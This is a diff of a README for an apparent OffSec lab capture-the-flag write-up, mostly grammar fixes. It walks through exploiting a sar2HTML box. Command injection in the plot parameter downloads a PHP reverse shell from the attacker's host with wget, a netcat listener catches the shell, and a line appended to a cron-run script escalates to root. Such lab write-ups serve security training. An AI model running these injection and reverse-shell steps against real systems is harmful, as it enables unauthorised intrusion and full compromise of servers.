sbensarg/offsec-labs-writeups/README.md

 - Let test first command injection vulnerability
 ![3](https://user-images.githubusercontent.com/38728250/194197162-062c2164-878c-4daf-83da-ef8ec179f861.png)
 python3 is there
 - So let's input our own php-reverse-shell from pentestmonkey.
-The script will open an outbound TCP connection from the webserver to a host and port of specified on the source code.
+The script will open an outbound TCP connection from the webserver to a host and port specified on the source code.
 Bound to this TCP connection will be a shell.
     - 1. ``` git clone https://github.com/pentestmonkey/php-reverse-shell  ```
-    - 2. ``` Vim php-reverse-shell.php ``` and edit the ip address and port number to 1234
+    - 2. ``` Vim php-reverse-shell.php ``` and edit the IP address and port number to 1234
     - 3. and then running the server by Execute ``` python -m http.server 8008 ```
-    - 4. In the url execute ``` sar2HTML/index.php?plot=;wget+192.168.51.35:8008/php-reverse-shell.php ``` for upload the file on the server
+    - 4. In the URL execute ``` sar2HTML/index.php?plot=;wget+192.168.51.35:8008/php-reverse-shell.php ``` for upload the file on the server
     - 5. testing if the file has been uploaded ```index.php?plot=;ls```, yes it is uploaded
-    - 6. Try to running it and Voila I have got the shell
+    - 6. Trying to run it and Voila I have got the shell
     - Take the first step by taking a proper terminal shell by the command ```import put:pty.spawn(‘/bin/bash’);```
     - There we go
-    - Let’s execute privilege escalation script (LinEnum is one such script that can be incredibly useful for privilege escalation on Linux systems.) on /var/tmp
+    - Let’s execute the privilege escalation script (LinEnum is one such script that can be incredibly useful for privilege escalation on Linux systems.) on /var/tmp
     - On my machine
     - ```cd tools/LinEnum```
     - And upload the file on the attacked machine by
     - ```Wget http://192.168.51.35/LinEnum.sh```
-    - And there we are, and then I run the script and checking for the output and analyzing the data so what all the results we have got by the linux enumeration script.
-    - so I found a cron job of a file which is getting executed with ```sudo ./finally.sh``` inside ```/var/www/html``` dir
+    - And there we are, and then I run the script, and I check for the output and analyze the data, so I found a cron job of a file that is getting executed with ```sudo ./finally.sh``` inside ```/var/www/html``` dir
-    - The file ```finally.sh``` has no write permission, On the other hand the ```write.sh``` has the execute permission.
+    - The file ```finally.sh``` has no write permission, On the other hand, the ```write.sh``` has the execute permission.
     - So as we have the permissions to ```write.sh``` we upload our shell, php shell to our ```/www/html``` dir.
-    - Lets start a reverse http server
+    - Let's start a reverse http server
     -  ```python -m http.server 8008```
     - Update the port on ```rev.php``` to 1337
     - Upload the script in ```/var/www/html$ wget 192.168.51.35:8008/php-reverse-shell.php```
-    - Start listen to the port 1337 by ```nc -lvp 1337```
+    - Start listening to the port 1337 by ```nc -lvp 1337```
     - ```Echo “php ./rev.php”  >> write.sh```
     - And yes we have got our root user shell
     - Capture the flag